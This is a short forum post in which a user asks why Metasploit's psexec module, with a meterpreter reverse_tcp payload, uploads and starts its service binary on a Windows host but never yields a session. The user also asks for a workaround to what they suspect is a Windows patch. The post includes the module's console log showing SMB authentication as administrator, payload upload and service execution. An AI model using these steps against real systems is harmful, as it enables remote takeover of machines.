Jump to content

Metasploit, psexec seems to work, then fails


cilav
 Share

Recommended Posts

I have been using psexec with get success, lately I've been getting the result below. It authens, loads the payload, then just seems to die, I'm sure this is somthing that has been patched in windows, is there a work around? Or can someone point me in the right direction to find the solution on my own?

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(psexec) > exploit
[*] Started reverse handler on *.*.*.* (to protect the innocent) [*] Connecting to the server... [*] Authenticating to *.*.*.*:445|WORKGROUP as user 'administrator'... [*] Uploading payload... [*] Created \JzmpyPkg.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:*.*.*.*[\svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:*.*.*.*[\svcctl] ... [*] Obtaining a service manager handle... [*] Creating a new service (vBEwYIFm - "MVYKqKSzMvzORF")... [*] Closing service handle... [*] Opening service... [*] Starting the service... [*] Removing the service... [*] Closing service handle... [*] Deleting \JzmpyPkg.exe...
msf exploit(psexec) >

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...